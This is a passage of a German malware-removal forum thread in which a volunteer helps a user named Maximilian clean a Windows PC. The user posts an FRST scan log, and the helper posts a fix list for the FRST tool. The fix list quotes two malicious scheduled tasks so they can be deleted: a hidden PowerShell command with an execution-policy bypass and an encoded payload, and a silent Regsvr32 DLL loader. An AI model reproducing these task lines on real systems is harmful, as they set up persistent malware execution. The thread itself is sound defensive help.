2016-04-13 20:22 - 2016-03-29 07:49 - 05202944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2016-04-13 20:22 - 2016-03-29 07:45 - 03078144 _____ (Microsoft Corporation) C:\WINDOWS\system32\esent.dll
2016-04-13 20:22 - 2016-03-29 07:45 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncbservice.dll
2016-04-13 20:22 - 2016-03-29 07:43 - 03428864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-04-13 20:22 - 2016-03-29 07:43 - 00521728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.Connectivity.dll
2016-04-13 20:22 - 2016-03-29 07:38 - 02798080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-04-13 20:22 - 2016-03-29 07:36 - 02722816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\esent.dll
2016-04-13 20:22 - 2016-03-29 07:35 - 00821248 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvewiz.dll
2016-04-13 20:22 - 2016-03-29 07:28 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvecpl.dll
2016-04-13 20:22 - 2016-03-29 07:27 - 07836160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-04-13 20:22 - 2016-03-29 07:27 - 05662208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-04-13 20:22 - 2016-03-29 07:27 - 00794112 _____ (Microsoft Corporation) C:\WINDOWS\system32\BFE.DLL
2016-04-13 20:22 - 2016-03-29 07:26 - 00958976 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemoteNaturalLanguage.dll
2016-04-13 20:22 - 2016-03-29 07:26 - 00402432 _____ (Microsoft Corporation) C:\WINDOWS\system32\FWPUCLNT.DLL
2016-04-13 20:22 - 2016-03-29 07:25 - 00712704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RemoteNaturalLanguage.dll
2016-04-13 20:22 - 2016-03-29 07:25 - 00269824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FWPUCLNT.DLL
2016-04-13 20:22 - 2016-03-29 07:21 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\system32\basesrv.dll
2016-04-12 16:31 - 2016-04-12 17:10 - 00000000 ____D C:\Users\Maximilian\Documents\Need For Speed
2016-04-12 16:27 - 2016-04-12 16:27 - 00000931 _____ C:\Users\Public\Desktop\Need for Speed™.lnk
2016-04-12 16:27 - 2016-04-12 16:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Need for Speed™
2016-04-12 14:41 - 2016-04-12 14:41 - 00000000 ____D C:\ProgramData\PopCap Games
2016-04-11 20:30 - 2016-04-11 20:30 - 00000929 _____ C:\Users\Public\Desktop\Peggle.lnk
2016-04-11 20:30 - 2016-04-11 20:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Peggle
2016-04-11 19:46 - 2016-04-11 19:46 - 00000000 ____D C:\Users\Maximilian\Documents\EA Games
2016-04-11 19:36 - 2016-04-11 19:36 - 00001027 _____ C:\Users\Public\Desktop\Medal of Honor Pacific Assault™.lnk
2016-04-11 19:36 - 2016-04-11 19:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Medal of Honor Pacific Assault™
2016-04-10 15:10 - 2016-04-10 15:10 - 00000000 ____D C:\Users\Maximilian\Documents\OneNote-Notizbücher
2016-04-09 15:38 - 2016-04-09 15:38 - 01653955 _____ C:\Users\Maximilian\Downloads\OptiFine_1.8.8_HD_U_H5 (1).jar
2016-04-09 15:34 - 2016-04-09 15:34 - 01653955 _____ C:\Users\Maximilian\Downloads\OptiFine_1.8.8_HD_U_H5.jar
2016-04-01 19:32 - 2016-04-01 19:32 - 00000000 ____D C:\Users\Maximilian\AppData\Local\pip
2016-04-01 19:31 - 2016-04-01 19:31 - 18423808 _____ C:\Users\Maximilian\Downloads\python-2.7.10 (2).msi
2016-04-01 19:31 - 2016-04-01 19:31 - 00734784 _____ (Oracle Corporation) C:\Users\Maximilian\Downloads\JavaSetup8u77.exe
2016-04-01 19:27 - 2016-04-01 19:27 - 02855741 _____ C:\Users\Maximilian\Downloads\nfsw-srv (2).rar

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-04-29 16:29 - 2016-02-29 18:42 - 00001146 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-04-29 16:29 - 2015-12-25 04:27 - 00000000 __SHD C:\Users\Maximilian\IntelGraphicsProfiles
2016-04-28 21:09 - 2015-12-30 13:25 - 00000884 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-04-28 20:47 - 2016-02-29 18:42 - 00001150 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-04-28 20:39 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-04-28 19:21 - 2016-01-30 22:09 - 00000000 ____D C:\Users\Maximilian\Documents\The Crew
2016-04-28 19:21 - 2016-01-30 22:09 - 00000000 ____D C:\Users\Maximilian\Documents\ProfileCache
2016-04-28 18:04 - 2015-12-25 21:57 - 00000000 ____D C:\Users\Maximilian\AppData\Local\CrashDumps
2016-04-28 17:28 - 2015-10-30 08:28 - 00032768 ___SH C:\WINDOWS\system32\config\ELAM
2016-04-28 16:59 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-04-27 20:44 - 2015-12-25 02:01 - 00000000 ____D C:\Users\Maximilian\AppData\Roaming\Skype
2016-04-27 16:48 - 2015-10-30 09:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-04-27 16:20 - 2015-12-25 00:42 - 00000913 _____ C:\Users\Maximilian\Desktop\nativelog.txt
2016-04-27 16:12 - 2015-10-30 20:35 - 00776766 _____ C:\WINDOWS\system32\perfh007.dat
2016-04-27 16:12 - 2015-10-30 20:35 - 00155544 _____ C:\WINDOWS\system32\perfc007.dat
2016-04-27 16:12 - 2015-10-30 09:21 - 00000000 ____D C:\WINDOWS\INF
2016-04-27 16:12 - 2015-08-31 13:01 - 01799166 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-04-27 16:05 - 2015-12-30 01:00 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-04-27 16:05 - 2015-10-30 08:28 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-04-25 20:58 - 2015-12-31 16:19 - 00000000 ____D C:\ProgramData\Origin
2016-04-25 19:43 - 2016-03-12 21:52 - 00000000 ____D C:\Users\Maximilian\AppData\Roaming\.minecraft
2016-04-23 21:15 - 2015-12-30 00:53 - 00000000 ____D C:\Users\Maximilian
2016-04-21 19:07 - 2015-08-31 12:52 - 00000000 ____D C:\Program Files (x86)\McAfee
2016-04-21 18:52 - 2015-12-30 14:09 - 00000000 ____D C:\Users\Maximilian\AppData\Local\ElevatedDiagnostics
2016-04-21 15:40 - 2015-08-31 12:52 - 00000000 ____D C:\ProgramData\McAfee
2016-04-21 15:39 - 2015-10-30 09:24 - 00000000 ___HD C:\WINDOWS\ELAMBKUP
2016-04-21 15:39 - 2015-08-31 12:52 - 00000000 ____D C:\Program Files\Common Files\McAfee
2016-04-21 15:38 - 2015-12-24 22:25 - 00000000 ____D C:\WINDOWS\System32\Tasks\McAfee
2016-04-21 14:53 - 2015-10-30 09:24 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-04-21 14:50 - 2015-11-02 19:05 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2016-04-19 18:11 - 2016-03-23 18:24 - 00000000 ____D C:\Users\Maximilian\Desktop\Te Krev FierKah
2016-04-19 18:06 - 2015-12-25 00:54 - 00000000 ____D C:\Users\Maximilian\Desktop\.minecraft
2016-04-19 16:49 - 2015-12-25 04:29 - 00000000 ___RD C:\Users\Maximilian\OneDrive
2016-04-16 23:11 - 2015-11-02 19:36 - 00000000 ____D C:\ProgramData\Temp
2016-04-16 11:43 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\rescache
2016-04-14 21:21 - 2016-03-29 23:02 - 00000000 ____D C:\Program Files (x86)\Steam
2016-04-14 20:31 - 2016-01-09 19:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-04-14 20:30 - 2016-01-09 19:52 - 00000000 ____D C:\Program Files\Java
2016-04-14 20:30 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\registration
2016-04-14 19:34 - 2015-12-30 00:48 - 00350008 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-04-14 19:32 - 2015-11-03 03:55 - 396799429 _____ C:\WINDOWS\MEMORY.DMP
2016-04-14 19:32 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-04-14 19:32 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-04-14 19:32 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2016-04-14 19:32 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-04-14 17:59 - 2015-08-31 12:50 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-04-14 17:59 - 2015-08-31 12:50 - 00000000 ____D C:\Program Files (x86)\WildGames
2016-04-14 17:57 - 2015-12-30 00:47 - 00000000 ___DC C:\WINDOWS\Panther
2016-04-14 14:21 - 2015-10-30 09:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-04-14 14:20 - 2015-12-25 17:59 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-04-14 14:16 - 2015-12-25 17:59 - 135176864 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-04-13 13:52 - 2015-12-25 04:27 - 00000000 ____D C:\Users\Maximilian\AppData\Local\Packages
2016-04-12 13:08 - 2016-02-29 18:42 - 00002268 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-04-12 13:08 - 2016-02-29 18:42 - 00002256 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-04-10 15:09 - 2016-03-14 21:12 - 00000000 ____D C:\Users\Maximilian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome-Apps
2016-04-09 15:12 - 2015-12-24 22:34 - 00003254 _____ C:\Users\Maximilian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\App Explorer.lnk
2016-04-06 20:32 - 2015-10-30 09:26 - 00829944 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-04-06 20:32 - 2015-10-30 09:26 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-04-03 00:49 - 2016-01-10 16:08 - 00000000 ____D C:\Users\Maximilian\AppData\Roaming\TS3Client
2016-03-30 23:41 - 2015-12-25 04:28 - 00000000 ____D C:\Users\Maximilian\AppData\Local\clear.fi

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2015-12-30 00:51 - 2015-12-30 00:51 - 0000102 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.64.bc

==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2016-04-21 15:36

==================== Ende von FRST.txt ============================
         
--- --- ---

Alt 29.04.2016, 21:10   #27
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Trojaner: FIEE!33F043CBDBF2 - Standard

Trojaner: FIEE!33F043CBDBF2



Lade Dir bitte von hier Revo Uninstaller Download Revo Uninstaller (alternativ portable Revo Uninstaller) herunter.
  • Installiere und starte das Programm. (Bebilderte Anleitung zu Revo Uninstaller)
  • Klicke auf Optionen und wähle als Sprache Deutsch.
  • Suche im Uninstallerfeld nach den Programmen:

    Amazon 1Button App

  • Wähle die Programme nacheinander aus und klicke jedes Mal auf Uninstall.
  • Wähle anschließend den Modus "Moderat" aus.
  • Reste löschen:
    Klicke auf dann auf und dann auf .

 

__________________
Logfiles bitte immer in CODE-Tags posten

Alt 29.04.2016, 21:19   #28
Maximilian1
 
Trojaner: FIEE!33F043CBDBF2 - Standard

Trojaner: FIEE!33F043CBDBF2



Tut mir wirklich leid aber.. ich finde die Amazon 1Button App nicht.

Kleine Statusmeldung:
Den ganzen gestrigen und heutigen Tag kam nicht einmal die Meldung "Trojaner gefunden" oder ähnliches. Na gut.. gestern wurde dieses Generic PUP.x, oder wie das heißt, wieder entdeckt, aber gestern und heute wurde, außer dem, nichts gefunden oder Isoliert^^

Scheint alles sauber zu sein, oder?

Alt 29.04.2016, 21:34   #29
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Trojaner: FIEE!33F043CBDBF2 - Standard

Trojaner: FIEE!33F043CBDBF2



FRST-Fix

Virenscanner jetzt bitte komplett deaktivieren, damit sichergestellt ist, dass der Fix sauber durchläuft!


Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:
ATTFilter
Task: {29E8CC38-AD54-4D44-ACB1-CB05CE2D4430} - System32\Tasks\{7A0C7D47-780D-047A-0F11-0D7A0B091108} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (Der Dateneintrag hat 9444 mehr Zeichen). <==== ACHTUNG
Task: {ABC3FFB2-DF04-4DC1-A4B9-D53AE3BAE20B} - System32\Tasks\{60001023-7877-A386-82BC-AD83BFA87133} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\3f50a886\9b68ba7.dll" <==== ACHTUNG
S3 Amazon 1Button App Service; c:\Program Files (x86)\Amazon\Amazon1ButtonApp\Amazon1ButtonService64.Exe [436032 2016-02-17] (Amazon Inc.)
S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys
C:\ProgramData\{BE2ACE5C-32B7-4777-9BDF-ECF87CDAB705}
C:\Program Files\Enigma Software Group
C:\WINDOWS\System32\Tasks\SpyHunter4Startup
C:\sh4ldr
C:\WINDOWS\system32\Drivers\EsgScanner.sys
C:\Program Files\Enigma Software Group
C:\Users\Maximilian\Downloads\SpyHunter-Installer.exe
C:\PROGRA~3\3f50a886
c:\Program Files (x86)\Amazon\Amazon1ButtonApp
C:\ProgramData\{FD6F83C0-EC70-4581-8361-C70CD1AA4B98}
C:\ProgramData\{BAF091CA-86C4-4627-ADA1-897E2621C1B0}
C:\Users\Public\Desktop\AVG.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG Zen
C:\Users\Maximilian\Downloads\nfsw-srv (2).rar
C:\Program Files (x86)\AVG
C:\Users\Maximilian\AppData\Local\AvgSetupLog
C:\Users\Maximilian\AppData\Local\Avg
C:\ProgramData\Avg
cmd: dir /oge-d %APPDATA%
cmd: dir /oge-d "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
cmd: dir /oge-d %PROGRAMDATA%
cmd: dir /oge-d %USERPROFILE%\Downloads
emptytemp:
         

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
  • Starte nun FRST erneut und klicke den Entfernen Button.
  • Das Tool erstellt eine Fixlog.txt.
  • Poste mir deren Inhalt.

__________________
Logfiles bitte immer in CODE-Tags posten

Alt 29.04.2016, 22:06   #30
Maximilian1
 
Trojaner: FIEE!33F043CBDBF2 - Standard

Trojaner: FIEE!33F043CBDBF2



FRST findet die Datei nicht??

In Acer(CFRST sind:
Hives
Logs
Quarantine
und nun noch Fixlist.txt

Wo sollte ich das speichern?

Antwort

Themen zu Trojaner: FIEE!33F043CBDBF2
mcafee, trojaner




Zum Thema Trojaner: FIEE!33F043CBDBF2 - Sry aber.. ich finde es nicht ( Tut mir wirklich leid - Trojaner: FIEE!33F043CBDBF2...
Archiv
Du betrachtest: Trojaner: FIEE!33F043CBDBF2 auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.